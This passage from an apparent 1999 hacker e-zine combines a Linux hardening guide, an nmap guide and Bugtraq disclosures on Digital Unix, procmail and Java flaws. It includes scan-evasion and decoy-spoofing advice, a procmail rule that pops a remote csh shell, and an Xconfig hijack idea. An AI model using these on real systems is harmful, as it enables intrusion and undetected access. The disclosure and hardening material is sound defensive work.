server) and also deny them the creation of subdirectories. User ftp Group ftp UserAlias anonymous ftp DenyAll AllowAll DenyAll This is what the entry looks like in proftpd.conf, this denies the remote anonymous users to write to any directory except of incoming, in that directory anonymous users are allowed to upload files, but they are denyed of reading the directory, deletetion of files, or the creation of subdirectories. If you are more paranoid and even if you have limited the usage of ftp only to valid users but you need more security, you can make use of a nice firewall, this though requires that most of your ftp users are local users, and remote users that are allowed usage of the ftp server have static IP's. To do so, you would setup a firewall allowing access from your subnet, and the remote users and would DENY everyone else trying to connect to it. SHADOW PASSWORDS One of the most important things is the password management. Passwords are held in the /etc/passwd file (in case you didn't know...). Leaving password files like that is a high security risk, and even if you don't allow access to the system to any user, should be more secure. Password files can be more secure with the usage of shadow, since password files are user readable you should switch to shadow (i don't understand why some distributions of Linux don't install by default shadowing), anyway as we said /etc/passwd is world readable, this means that any user with access to your system is able to read the password file. The encryption of password files is really weak, and a simple user with a password cracker would be able to crack a few passwords in a few minutes. Its highly advisable to all users either with local boxes or company administrators to switch to shadowing. To use shadowing on your system you only have to run the pwconv command usually residing in the /usr/sbin directory. This will create a seperate file in the /etc dir called shadow, which holds the encrypted passwords, and will replace the password field in the /etc/passwd file with a "x" e.g pestilence:x:500:500::/home/pestilence:/bin/bash This is the entry in passwd after the usage of shadow. The original password is kept in /etc/shadow which is readble only by root, thus denying now the local users to "take a look" at your passwords. For more security, if you use a radius server with the companion of a cisco router for authentication, it would be wise to deny access to users at your system, to do this simply change the shell entrys in the passwd file to some non-existened shell. POP POP is used to allow users to retrieve their e-mail remotely. There aren't much of pop daemons, but its preffered not to use the default that comes with the installation (ipop3d), i would advise you to use one such as qpopper, which runs through inetd and can be used with TCP Wrappers. POP is a service that usually is wide open, this means that users that have accounts on your system, but use also on some other ISP can connect to your system and retrieve their mail. Usually it's left like that, but if you are really paranoid you can block all remote systems and allow only local users to connect and retrieve their mail. Just 1 thing must be sure, don't install a pop daemon that doesn't get the needed support by it's authors, or doesn't produce some kind of detailed logs (such as failed password entry attempts, or connections). SENDMAIL Here things get a bit more complicated, sendmail is the daemon used to send and receive e-mails between hosts. Sendmail uses several configuration files, with its main config file being sendmail.cf. Through this file you declare the files to be used for various purposes, such as the list with the allowed domains to use sendmail (ip-allow, name-allow), and the relay list, which contains the domains of virtualhosts you host. Lets take a closer look to sendmail. Unfortunately sendmail is propably one of the most buggy services on the Internet, up to now nearly all versions of it have either a remote, or local exploitation. Because of this problems you should be really carefull with sendmail, a small missconfiguration might cause you a big headache later. The main files you should be carefull with are: ip-allow --> here you enter all the IP's you want to allow to use your sendmail...don't leave it blank, otherwise you will have the whole Internet using your sendmail to mail. name-allow --> same as above but here you enter the hostnames of the systems (usually used when VirtualHosting is being done on your systems). relay --> This file contains the host to wich we allow relaying...this also shouldn't be left empty. sendmail.cw --> this file holds all the aliases for your system, this is again used if you host several virtual domains. Don't forget to oftenly upgrade your sendmail...yes i know this is kinda like a small pain in the ass, but it's also your only way to prevent the damage that a newly discovered bug can produce. DNS DNS is the service used to resolve the ip address of a host to a valid hostname. All big networks with their own domain use DNS, DNS has been subject to heavy remote exploitations in the past, and also is a service than can be used to give away allot of usefull info to intruders (such as your network systems, intruders combining the BIND version can sometimes guess the remote O/S and it's version). It's high advisable to move to BIND 4.9.7 or the 8.X series, if you are still running a 4.9.6 series of it, then you are vulnerable to a remote root exploitation. Make sure you have configured DNS properly, otherwise you might experience problems. Also the use of a firewall (for the interactivy between the primary and the secondary nameserver) would be highly recommended. LOGGING One of the most important aspects of system administration, is extensive logging, and also constant monitoring of the systems. Linux logs use various loggers, all of the logs are kept under /var/log. Let's take a better look at the loggers of Linux: messages --> here the system ouputs various kernel, and service messages with the use of sysklogd secure --> here the system logs connection attempts to various ports from local, or remote hosts. mailog --> The sendmail daemon logs nearly everything here. xferlog --> the ftp daemon outputs its messages here. wtmp --> When a user logs, or the system reboots this file changes, it's a binary file and you can't "cat" it or "tail" it, to get access to it you use the "last" command. This command outputs formated the data kept in wtmp. System logs allthough are kept under root privilleges doesn't mean once hacked they cant be modified, there are various tools in the trade which allow users to erase specific strings from them and thus hide their appearance on your systems. A way to make it more difficult to erase their presence from the logs (allthough this doesn't mean they cant still erase), is to use remote logs, sysklogd has a feature, which allows system admins to log also on remote systems. I would reccomend this method, since it allows you to have a seperate log file on a remote system, and since the hacking scene has allot of newbies they nearly never check for remote logs. Allthough the logging facility of Unix systems is good, its not designed to heavy log. To have a better chances of detecting suspicious moves, i recommend log daemons for this specific task...detect and log, such loggers are iplog (which i widely use on my systems). Iplog is a set of 3 log daemons: tcplog --> logs and detects all tcp connections, it's also able to detect and log, scans using nmap. udplog --> logs all udp traffic icmplog --> logs all icmp traffic Always try to enable seperate logs for all your daemons (e.g qpopper --> /var/log/pop), this makes the monitoring process more easy. Get logcheck,this program will scan your regular logs for security violations, Unusuall system events, etc. Try to monitor regulary your systems logs...don't let them pass by, before the storm there are always some drops of rain...so you might be lucky and stop the intruders before they gain access. Make some shell script for your logs, and make them scan your logs for specified strings, enable their usage with the cron daemon, and make them check the logs in small period of time, so you can have a nice organized report in small time periods, without confusing your head in the (usually) huge system logs. XWINDOWS Xwindows is another security headache. Unfortunately Xwindows are allot of risk, so i would advise if you use a system as a server, not to use Xwindows, as you risk your security with their usage. If though you need to make use of them, make sure to setup some security, use some firewall, and don't forget of the "xhost -" command which will disable remote access to your X facility. TELNET If there isn't a real necesity of it, disable it. Allthough telnet by itself isn't that much of a security risk, it can be usefull to future intruders to work their way in e easily. If you need telnet, try to setup a firewall to restrict access to it. A simple move also to the total newbies would be to change you /etc/issue.net file, issue.net usually contains the type of O/S you run, and it's used as a banner to telnet connections. Allthough there are toold in the trade to detect what a remote systems O/S is (nmap, quesso), there are also plenty of windows hacker wannabes which usually will just telnet to check what O/S your running...deny (even if it's really easy to determine the remote O/S) them knowledge on your system. KERNEL OPTIONS On the 2.2.x series of kernels there are a few interesting options using booleans under your /proc/sys/net/ipv4 folder, this are icmp_echo_ignore_all, icmp_echo_ignore_broadcasts .etc, this files are used to specify some networking "reactions" of your system...it is advised (not necessary though) to: echo 1 > those files, this will prevent ping replys to ping requests, and also will help you avoid smurf attacks over your network. tcp_syncookies is also advised to be echoed to 1, if your system is a widely used server. While compiling the 2.2.x kernel don't forget to include as many networking options as you can, such as routing messages, firewall support, etc. This will help you setup a more effectively working network. SNIFFERS Allthough sniffers aren't necessary to run all the time, it's wise to use them time to time. Network sniffers catch and display the datagrams moving around your network, it's usually a helpfull way to detect problems in your network. Latest kernels have also the abillity to detect if some device has entered promiscous mode (sniffer activated on some device). Make sure simple users dont have access to the sniffer, otherwise you will have big time troubles (since usually most services use plain text passwords). There is a big collection of good sniffers, so i wont discuss any of them...i usually fire up X and run Ethereal if there is a big need to do so. AUDITING TOOLS This tools are widely used by hackers to scan networks for known problems...so if hackers use them, you should also use them. Nessus is at the moment the best tool for such a task, its nearly updated everyday and currently it supports 209 security checks. Always run a scan on your network, check if you missed something, don't allow intruders gain advantage of something you forgot. This tools should be used very often on ALL your systems. TEMPORARY SYSTEMS Allot of times before i install a server, i temporary connect it to the network so i can ftp and fetch all the needed files. Since this systems are getting ready to either replace an existing server, or be a part of the network as new a server, you should be very carefull. Intruders dont always scan a single system, they might scan a whole subnet to get information on every system you have running on your network. So even if that system is a temporary one, don't bypass it's configuration, configure it to be as secure as it can be, and try to deny every kind of connection to it (use a firewall or something). ## /etc/inetd.conf ## Through this file some of the systems services are handled. The default file has many useless and unwanted services open. You should modify this file immediately after you install your system. Close nearly all ports, and leave open only those you need, echo, time, date and such ports are rarely used, and are not needed by any programs, so make sure you disable them. Services in inetd.conf have the abillity to work with tcp_wrappers. We are going to explain tcp_wrappers in the next section. TCP WRAPPERS Tcp Wrappers are files that are used to restrict access to your system( allthough i prefer using a firewall for this kind of work). If you are new to the firewall world, and need really quickly to restrict access to some services use them, but then go and read the firewall HOWTO :). The best way would be to use both a firewall and tcp wrappers. Tcp wrappers use the files: /etc/hosts.allow and /etc/hosts.deny, hosts.allow holds all the ip addresses of the systems or subnets you want to allow access to services, and hosts.deny include hosts that are denyed to access services. WARNING: Not all services use tcp wrappers, for instance sendmail is now a stand alone daemon, so tcp wrappers wont work with it, make sure you see if a service supports tcp wrappers before feeling "kinda" secure. FIREWALLS Firewalls are something that every administrator loves to have on his network, firewalling can have many different faces. 1) Connect a Internal Network through a single system (also called masquerading, but it also can act as a firewall, denying the remote users to log into the internal Network). 2) A system which through a program such as ipfwadm (for the 2.0.x kernels) and ipchains (for the 2.2.x kernels) can block and filter connections to user specified ports. A firewall acts as a wall between your system and the Internet, you configure it the way you like it, and it acts that way. For instance on my system (kernel 2.2.4) when i want to block users connecting to my telnet port, i would issue the following command: ipchains -A input -p tcp -s 0/0 -d 194.xxx.xx.xx telnet -j DENY -l Let's take a better look at this commmand: -A input --> ipchains after installation come with 3 preinstalled chains (input/output/forward, meaning the input data, output data, and finally forwarding data), with the -A flag we tell ipchains to Append our "rule" to the chain. -p tcp --> here we specify the protocol, i think the protocol i mention is obvious...other protocols include udp, and icmp -s 0/0 --> -s stands for source IP/host/subnet, you can either specify a whole subnet or a single IP, 0/0 stands for everyone...so we tell ipchains to match any ip address to this rule -d 194.xxx.xx.xx --> -d stands for destination IP/host/Network, here we specified a single IP (xxx used for privacy reasons, change them to your IP address)this ip is the IP of the destination host, meaning the host that receives all the data, usually you would specify your system, unless you have a router-box telnet --> after the destination host you specify the port, or service, ipchains can understand services which already exist in the /etc/service file, otherwise you need to specify a port / range of ports. For instance if we wanted to block ports from 6000 up to 6010 we would type: 6000:6010 -j DENY --> here we declare to ipchains what to do with datagrams that match this rules, simply here we DENY them, other methods include ACCEPT and REJECT -l --> -l stands for logging, enabling this options ipchains will output through the kernel into /var/log/messages every packet that matches this rules...be aware that this produces usually some heavy logs. Remember that when you create a rule think wisely, this service may be needed, or some other hosts must have access to it, by blocking a needed service you might create some problems. Always remember that when you want to block a service, but you want to give access to certain systems/networks, you have to declare first the ACCEPT rules, and then the DENY, otherwise all hosts will be denyed, since ipchains compares the datagrams with the chains in a descenting order. For example say we own pestilence.foo.com and we want to grant access to the ftp service to cool.foo.com, but DENY everyone else. We would type the following: ipchains -A input -p tcp -s cool.foo.com -d pestilence.foo.com ftp -j ACCEPT ipchains -A input -p tcp -s 0/0 -d pestilence.foo.com ftp -j DENY -l Now cool.foo.com has access to out ftp, but the rest of the Internet doesn't. For more information on firewalling take a look at the HOWTO. Comments, suggestion pestilence@netplan.gr flames > /dev/null /* keep them to you :p */ Further References Here are links that every admin should visit... http://www.genocide2600.com/~tattooman /* The biggest Security archive of Planet earth...just name it...tattoo has it...*/ http://howto.linuxberg.com /* All the known Linux HOWTO's */ http://www.geek-girl.com/bugtraq/index.html /* All BUGTAQ postings are there*/ http://www.technotronic.com /* Another security related site, worth looking */ http://www.rewted.org /* Same as above */ http://www.freshmeat.net /* Nearly every known Linux app indexed */ http://www.linuxberg.com /* The Linux tucows site */ /* and finally some news produced in a way you never saw: (thats for the fun...)*/ http://www.innerpulse.com @HWA 35.0 Guide to using NMAP by Lamont Granquist . ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Packetstorm http://www.genocide2600.com/~tattooman/new.shtml Link Date: Mon, 5 Apr 1999 16:50:23 -0700 From: Lamont Granquist To: nmap-hackers@insecure.org Subject: NMAP guide NMAP has been getting a lot of review on what its capabilities are lately, so I thought I'd take a shot at it as well. I skipped over a few things that I didn't think were really worth mentioning (you better be able to figure out -p and -F). Comments more than welcome. ------------------------------------------------------------- NMAP does three things. First, it will ping a number of hosts to determine if they are alive or not. Second, it will portscan hosts to determine what services are listening. Third, it will attempt to determine the OS of hosts. Of course NMAP is very configurable, and any of these steps may be omitted, (although portscanning is necessary in order to do an OS scan), and there are multiple ways to accomplish most of these, and many command line switches to tweak the way that NMAP operates. Target Selection You can specify NMAP targets both on the command line or give a list of targets in a filename with the -i option. As the NMAP help documentation suggests you can use the hostname/mask method of specifying a range of hosts (cert.org/24 or 192.88.209.5/24) or you can give a explicit IP range (192.88.209.0-255). The '24' in 'cert.org/24' is the number of bits in the mask, so /32 means "just that host", /24 means "the 256 addresses in that Class C", /16 means "the 65536 addresses in that Class B", /8 would be "the 2^24 addresses in that Class A" and /0 would scan all possible (IPv4) 2^32 IP addresses. Ping Scans The default behavior of NMAP is to do both an ICMP ping sweep (the usual kind of ping) and a TCP port 80 ACK ping sweep. If an admin is logging these this will be fairly characteristic of NMAP. This behavior can be changed in several ways. The easiest way is, of course, to simply turn off ping sweeps with -P0. If you want to do a standard ICMP ping sweep use -PI. If you are trying to get through a firewall, though, ICMP pings will likely be blocked and using packet filtering ICMP pings can even be dropped at the host. To get around this NMAP tries to do a TCP "ping" to see if a host is up. By default it sends an ACK to port 80 and expects to see a RST from that port if the host is up. To do only this scan and not the ICMP ping scan use -PT. To specify a different port than port 80 to scan for specify it immediately afterwards, e.g. -PT32523 will ACK ping port 32523. Picking a random high-numbered port in this way may work *much* better than the default NMAP behavior of ACK pinging port 80. This is because many packet filter rules are setup to let through all packets to high numbered ports with the ACK bit set, but sites may filter port 80 on every machine other than their publically accessable webservers. You can also do both an ICMP ping scan and an ACK scan to a high numbered port with, e.g. -PB32523. However, if a site has a really, really intelligent firewall that recognizes that your ACK packet isn't part of an ongoing TCP connection it might be smart enough to block it. For that reason, you may get better results with a TCP SYN sweep with -PS. In this case, scanning a high-numbered port will probably not work, and instead you need to pick a port which is likely to get through a firewall. Port 80 is not a bad pick, but something like ssh (port 22) may be better. So the first question to ask yourself is if you care about wasting time scanning machines which are not up and if you care about getting really complete coverage of the network? If you don't care about wasting time and really want to hit all the machines on a network, then use -P0. Pinging machines will only cause you to have more of a signature in any log files and will eliminate machines which might possibly be up. Of course, you will waste time scanning all the IP numbers which aren't assigned. If you do ping machines, an ICMP ping sweep is probably more likely to be missed or ignored by system administrators. It doesn't look all that hostile. If you think you're up against a firewall you should experiment with which kinds of pings seem to get through it. Do ICMP pings work at all? Can you ping thier webserver? If not, then don't bother with ICMP pings. Can you ACK ping thier webserver? If not, then you have to go with SYN pings. What if all you want to do is a ping scan? Then use -sP. Port Scanning The vanilla scan is a TCP connect() scan (-sT). These are loggable. You probably don't want to do these. SYN scans (-sS) are the workhorse of scanning methods. They are also called "half-open" scans because you simply send a SYN packet, look for the return SYN|ACK (open) or RST (closed) packet and then you tear down the connction before sending the ACK that would normally finish the TCP 3-way handshake. These scans don't depend on the characteristics of the target TCP stack and will work anytime a connect() scan would have worked. They are also harder to detect -- TCP-wrappers or anything outside of the kernel shouldn't be able to pick up these scans -- packet filters like ipfwadm or a firewall can though. If a box is being filtered NMAP's SYN scan will detect this and report ports which are being filtered. FIN (-sF), NULL (-sN) and XMAS (-sX) scans are all similar. They all rely on RFC-compliance and as such don't work against boxes like Win95/98/NT or IRIX. They also work by getting either a RST back (closed port) or a dropped packet (open port). Of course, the other situation where you might get back a dropped packet is if you've got a packet filter blocking access to that port. In that case you will get back a ton of false open ports. A few years back these kinds of scans might have been stealthy and undetectable. These days they probably aren't. You can combine any of the SYN, FIN, NULL or XMAS scans with the (-f) flag to get a small fragment scan. This splits the packet which is sent into two tiny frags which can sometimes get through firewalls and avoid detection. Unfortunately, if you're not running a recent version of an open source O/S (Linux or Net/Open/FreeBSD) then you probably can't frag scan due to the implimenation of SOCK_RAW on most unixes (Solaris, SunOS, IRIX, etc). See Fyodor's NMAP portability chart to see if -f is supported on your platform. For the initiated out there, you could modify libpcap to allow you to send packets in addition to sniffing them by opening the packet capture device rw instead of ro. Then you need to build a link-layer (probably ethernet) header and then you could impliment your own frag scanner. For bonus points impliment all of the different SYN, FIN, NULL and XMAS scans *and* allow for sending the fragments out in reverse order (which helps for getting through firewalls). This hasn't been done (yet) in NMAP due to the fact that NMAP needs to support multiple different link layer interfaces (not just ethernet) and needs code for dealing with ARP. If anyone wants to code this up, I'm sure that people would appreciate it. UDP scanning (-sU) in NMAP has the same problem as FIN scans in that packet filtered ports will turn up as being open ports. It also runs extremely slowly against machines with UDP packet filters. Another type of scan is the bounce scan (-b ) which, if there is insufficient logging on the ftp host you're using to bounce, is completely untraceable. Recent FTP servers shouldn't let you do these kinds of scans. The last scanning option that I'm going to mention is identd scanning (-I) which only works with TCP connect scans (-sT). This will let you know the owner of the daemon which is listening on the port. Provided, of course, that the site is running identd and is not doing something intelligent like using a cryptographic hash (i.e. pidentd -C). You *have* to make complete 3-way TCP handshakes for this to work, so this is not very stealthy. It does, however, give you a lot of information. It only works against machines that have port 113/auth open. Source IP Deception You can also take advantage of the fact that you can change your source address. The simplest way to do this is with -S . If you are on a broadcast ethernet segment you could change your source address to an IP which doesn't exist and then you simply sniff the network for the reply packets. And if you are not on a leaf node/network then as long as the reply packet will get routed by you, you can use it. To turn this on its head: the next time you get scanned, do a traceroute on the machine that scanned you. Any of the machines on any of the networks that those packets went through could have been the machine which was *really* scanning you. The other deceptive measure is to use decoy scans. You spoof a ton of scans originating from decoy machines and insert your IP in the middle of it somewhere. The admin at the site you are scanning is presented with X number of scans and no way to determine which one actually did it. For bonus points, combine this with the previous tactic and spoof an IP address which doesn't exist. If you don't spoof your own IP address make sure to use "likely" decoys -- use machines which were connected to the net at the time you made your scans and don't use sites like www.microsoft.com. Ideally you want a lot of linux boxes as decoys. The more decoys the better, but obviously the slower the scan will go. [ QUESTION: do decoy/spoof scans also decoy/spoof the ping scan? can you combine decoy scans and "ME" spoofing like this? does a decoy/spoof scan also decoy/spoof the OSscan? ] OS scanning This is the -O option. To use it requires one open and one closed port. The closed port is picked at random from a high-numbered port. Machines which do packet filtering on high-numbered ports will cause problems with OS detection (many sites will filter packets to high numbered ports which don't have the ACK bit set). Also excessive packet loss will cause problems with OS detection. If you run into trouble try selecting an open port which isn't being served by inetd (e.g. ssh/22 or portmap/rpcbind/111). OS scanning also reports the TCP sequence number prediction vulnerability of the system. If you're 31337 you will be able to use this to exploit trust relationships between this machine and other machines. There's a reasonably decent phrack article on this in phrack P48-14, but you should beware that it isn't this easy -- you need to worry about ARP (what's that? how does it work? i suggest familiarizing yourself with tcpdump) and if you're trying to exploit rsh/rlogin you need to worry about spoofing the authorization connection as well. -- Lamont Granquist lamontg@genome.washington.edu Dept. of Molecular Biotechnology (206)616-5735 fax: (206)685-7344 Box 352145 / University of Washington / Seattle, WA 98195 PGP pubkey: finger lamontg@raven.genome.washington.edu | pgp -fka @HWA 36.0 Digital Unix 4.0 has potential root compromise in /var perms ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 4 Apr 1999 20:31:12 +0300 From: Harhalakis Stefanos To: BUGTRAQ@netspace.org Subject: Digital Unix 4.0E /var permission On Digital Unix 4.0E with the latest patch kit aplied, after a new installation /var has g+w for group system. Anyone that can crack any account with gid==system may exploit this (not tested but there should be no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE is forcing g+w to /var.. The whole thing is done while executing /sbin/rc3.d/S95xlogin and only if CDE is selected. <> ------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 10:47:26 +0200 From: Jochen Thomas Bauer To: BUGTRAQ@netspace.org Subject: Re: Digital Unix 4.0E /var permission Hello, On Sun, 4 Apr 1999 Harhalakis Stefanos wrote: >On Digital Unix 4.0E with the latest patch kit aplied, after a new >installation /var has g+w for group system. This problem seems to exist in other versions of Digital Unix, too. At least on Digital Unix 4.0c and 4.0d (Factory Installed Software, no patches applied, CDE in use) /var, which in my case is a link to /usr/var, has drwxrwxr-x 28 root system 512 Feb 11 12:58 /usr/var/ permissions. However, on Digital Unix 4.0b (Patch kit DUV40BAS00008- 19980821 applied, Software installed from CD, CDE in use) /usr/var has drwxr-xr-x 23 root system 512 Feb 11 1998 /usr/var/ permissions. >The whole thing is done while executing /sbin/rc3.d/S95xlogin and >only if CDE is selected. This does not seem to be the case for Digital Unix 4.0c and 4.0d. There is no chmod of /var in /sbin/rc3.d/S95xlogin. >Anyone that can crack any account with gid==system may exploit this >(not tested but there should be no problem with mv'ing /var/sbin, >/var/adm etc etc..). Or do the following: CDE's Xconfig file is a link from /var/dt/Xconfig to the actual config file. Moving /var/dt and creating your own /var/dt, you could replace the system Xconfig file with your own version which has the session manager specification Dtlogin*session: /usr/dt/bin/Xsession replaced with something more evil. Then just wait for root to log in on the console.... -- Jochen Bauer Institute for Theoretical Physics University of Stuttgart Germany PGP public key available from: http://www.theo2.physik.uni-stuttgart.de/jtb.html ------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 10:18:28 -0500 From: implosion To: BUGTRAQ@netspace.org Subject: Re: Digital Unix 4.0E /var permission First of all, under Digital UNIX, the system group is the group that is 'pseudo-root', i.e. have near root privilages and are allowed to su into root. /var, which under a default install, is a sym-link to /usr/var, contains all of the system accounting files, LSM, and other system specific files that all System Administrators would need to run thier system. So, it is only logical that system have write permissions to that directory. Also, one should note that any system administrator should (and would, I would hope), only put _secure_ accounts in the system group, i.e. any account that is going to utilize a safe password and those accounts are not going to have set-uid or gid executables attached to them. One more note: as an ls -la of /sbin/rc3.d would show you, S95xlogin is only a sym-link to /sbin/init.d/xlogin. The S95 is there so when init comes up to run level 3, it will start (the S tells it that), and the 95 is placed there to put it in order - you add a numeric number to the front of the executable, so when the rc3 script processes /sbin/rc3.d, it gets launched after certain daemons and programs that need to be running in order for it to start. To the best of my knowledge, xlogin isnt doing anything to the /var permissions. -Implosion On Sun, 4 Apr 1999, Harhalakis Stefanos wrote: > On Digital Unix 4.0E with the latest patch kit aplied, after a new > installation /var has g+w for group system. Anyone that can crack any > account with gid==system may exploit this (not tested but there should be > no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE > is forcing g+w to /var.. The whole thing is done while executing > /sbin/rc3.d/S95xlogin and only if CDE is selected. > > <> > @HWA 37.0 Running Procmail To: BUGTRAQ@netspace.org Subject: Re: [SECURITY] new version of procmail with security fixes debian-security-announce@LISTS.DEBIAN.ORG writes: >A new version of procmail has been released which fixes a couple >of buffer overflows and has extra security checks. > >We recommend you upgrade your procmail package immediately. As the person who fixed most of those overflows I suppose I should elaborate on this. First off, for non-debian users, the source to the current procmail release can be fetched from: http://www.procmail.org/procmail.tar.gz ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz PGP signatures can be found next to the those (".sig"), made by the key with keyid 0x4A25D351, availible on the keyservers or at http://www.procmail.org/pgp-key.html Mirrors will be announced on the procmail webpage (http://www.procmail.org/) as they are confirmed. All versions of procmail previous to 3.12 could overflow heap allocated buffers, either when given a sufficiently long command line argument, or during expansions while processing procmailrc files. If the later occurs during the processing of /etc/procmailrc on systems where procmail is installed setuid root or is run as the local delivery agent, root access may be obtainable. If procmail is installed setgid, then the command line overflow exposes that group, but not (directly) root. Overflows that occur while processing user procmailrc files may give out setgid and/or that user's access. The details are similar to any other program with heap-allocated buffer overflow. None of overflows directly involved the message being processed, but rather were triggered by expansions in the user's procmailrc file. Since only the user can change that, there should be no problem...except that: a) procmail is installed setgid mail on many systems and (depending on the spool configuration and system) may not have given up those privileges, and b) many rcfiles extract data from the message (say, the contents of a header, or a snippet of the body) and then use that in later conditions. (a) means that a local user may be able to obtain setgid mail rights, while (b) means that remote exploits may be possible. However, even when self-inflicted with no gain, crashing on overflow is just rude. Closing the overflows has been a matter of simply checking, in the correct places, that there's enough space to do what needs to be done. While I can't rule out doing so in the future, we have not moved to a scheme of dynamically allocating everything, partly because I don't have the time to debug such a scheme, and partly because it isn't clear that it would even be the right thing to do (think DOS-attacks). I'm not claiming to have fixed them all -- I've been following this list too long to be that stupid -- but we have our eyes open and are actively working on catching them when we find them. Bug reports and comments should be sent to . I have not heard of or seen any exploits. (Waste of typing to say that.) Philip Guenther ---------------------------------------------------------------------- guenther@gac.edu UNIX Systems and Network Administrator Gustavus Adolphus College St. Peter, MN 56082-1498 Source code never lies: it just misleads (Programming by Purloined Letter?) -------------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 16:56:16 -0500 From: Philip Guenther To: BUGTRAQ@netspace.org Subject: Procmail version 3.13.1 released How apt my previous words... I have released procmail version 3.13.1, which fixes a few buffer overflow that I had missed previously and eliminates a keyword conflict with newer versions of gcc. These buffer overflows are probably 'slightly more difficult' to exploit as they involve particular variables instead of variable expansion in general. My apologies to those who downloaded version 3.13 yesterday. http://www.procmail.org/procmail.tar.gz ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz Debian has been notified and so will probably be releasing an updated package shortly. (If other vendors want to be notified of procmail releases ahead of time they should e-mail me.) Philip Guenther Procmail Maintainer bug@procmail.org @HWA 37.1 More Procmail problems ~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 5 Apr 1999 19:40:37 +0100 From: Chris Evans To: BUGTRAQ@netspace.org Subject: More procmail Hi, Well well since Debian appear to have "broken silence" on the procmail front rather than wait for an official announcement... I found something potentially more serious than boring heap overflows. It is allegedly fixed in the latest procmail release but I haven't checked. As a summary local users can dump the contents of any file to screen. As a comment I would suggest anyone running procmail with elevated privs either a) Needs their head examined or b) Hasn't read the code. Here is a quote of a previous mail I sent various people when I first found the file handling issue. I also recommended to the procmail team that they review _all_ of their file handling code. I have no idea whether this recommendation was taken on board or not.. Cheers Chris -----8<-------- However on to more interesting things, I have found a much more serious security hole in procmail's file handling which can lead to users dumping the contents of arbitrary files they should not be able to read to the screen. The faulty code sequence is in the handling of .procmailrc files and goes something like 1) stat .procmailrc (as root) - if it can't be stat'ed keep root privs 2) open .procmailrc 3) do lstat on .procmailrc for security check By replacing .procmailrc after steps 1) and 2) with a symlink to the file to dump and a regular file respectively, we can win a race condition. You might not think this is a very plausible race but with a few deep directory/multiple symlink tricks/SIGSTOP/etc. the window can be made quite wide. This is definitely exploitable. ---------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 21:50:03 -0400 From: Kragen Sitaker To: BUGTRAQ@netspace.org Subject: Re: more procmail Chris Evans writes: > As a comment I would suggest anyone running procmail with elevated > privs either > > a) Needs their head examined or > b) Hasn't read the code. Procmail is generally not useful when running on behalf of the person who wrote the email it's being given as input. When it is running on behalf of someone else, which is the usual case, it has privileges that the sender did not. In my book, that means it's running with elevated privs. Common examples of this situation: - filtering your incoming mail with procmail - running a mailbox (of mail from other people) through procmail -- Kragen Sitaker This is exactly how the World Wide Web works: the HTML files are the pithy description on the paper tape, and your Web browser is Ronald Reagan. -- Neal Stephenson, at http://www.cryptonomicon.com/beginning_print.html ---------------------------------------------------------------------------- Date: Tue, 6 Apr 1999 20:00:03 -0500 From: Philip Guenther To: BUGTRAQ@netspace.org Subject: Re: More procmail Chris Evans writes: ... >As a summary local users can dump the contents of any file to screen. As a >comment I would suggest anyone running procmail with elevated privs either > >a) Needs their head examined or >b) Hasn't read the code. > >Here is a quote of a previous mail I sent various people when I first >found the file handling issue. I also recommended to the procmail team >that they review _all_ of their file handling code. I have no idea whether >this recommendation was taken on board or not.. Hmm, I guess I failed to cc you on the discussion that later took place on this issue. What we eventually settled on and was incorporated into version 3.12 was for procmail to always open user rcfiles as the user (/etc/procmailrc will still be opened and processed as root). On some systems where special group privileges are needed to deliver to the mailspool but that have broken set*gid() system calls, procmail will attempt the open as root and if it succeeds then it'll close it, become the user, and open it again. This last case may still allow for DOS attacks by symlinking to, say, a serial device that blocks on open, so I suppose the open as root should be a non-blocking open. The truly paranoid will abolish the central mailspool directory and group 'mail' in favor of spooling mail to the user's home directory, a setup procmail readily supports. As for the rest of the file handling code, what I've had the time to review has looked safe. Procmail becomes the user before it starts processing the contents of the $HOME/.procmailrc, so problems should be limited to what the user could have done without procmail at all. While the permissions of the $HOME/.procmailrc are checked closely, procmail tries to the trust the user the rest of the time; if the user wants to process recipes from someone else's rcfile, procmail will let them: trusting the other user was their explicit choice. Resource consumption attacks (say, opening /dev/zero as an rcfile) should be dealt with like all resource consumptions attacks: audit and keep a baseball bat next to your desk. Philip Guenther Procmail Maintainer bug@procmail.org ---------------------------------------------------------------------------- Date: Wed, 7 Apr 1999 08:50:28 -0700 From: Ricky Connell To: BUGTRAQ@netspace.org Subject: Re: More procmail Philip Guenther writes: =Procmail becomes the user before it starts =processing the contents of the $HOME/.procmailrc, so problems should be =limited to what the user could have done without procmail at all. Not quite true. The procmail rule: :0 * ^Subject: HACK | setenv DISPLAY beida:0;/usr/openwin/bin/xterm -e /bin/csh will, in fact, pop a shell from the secured mail server to whereever the user specifies, running as the user. So if they control their own .procmailrc, they can log into the mail server whenever they desire, which may not be a machine that they would normally have access to. The paths may need to be changed to reflect the OS of the mail server. I have patched my procmail to deal with this by forcing it to use smrsh. In doing so, I also discovered the procmail calls sendmail explicitly at some point in it's operation (didn't take the time to figure out where it does it). This might also be of concern, but it wasn't immediately obvious to me how this might be exploited. -- Ricky --- ricky@smi.stanford.edu (650) 498-4405 Unix and Network Administrator @HWA 38.0 Security hole in Java 2 (and JDK 1.1.x) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 5 Apr 1999 08:56:10 -0400 From: Gary McGraw To: BUGTRAQ@netspace.org Subject: Security Hole in Java 2 (and JDK 1.1.x) Hi all, Karsten Sohr at the University of Marburg in Germany (email sohr@mathematik.uni-marburg.de) has discovered a very serious security flaw in several current versions of the Java Virtual Machine, including Sun's JDK 1.1 and Java 2 (a.k.a. JDK 1.2), and Netscape's Navigator 4.x. (Microsoft's latest JVM is not vulnerable to this attack.) The flaw allows an attacker to create a booby-trapped Web page, so that when a victim views the page, the attacker seizes control of the victim's machine and can do whatever he wants, including reading and deleting files, and snooping on any data and activities on the victim's machine. The flaw is in the "byte code verifier" component of the JVM. Under some circumstances the verifier fails to check all of the code that is loaded into the 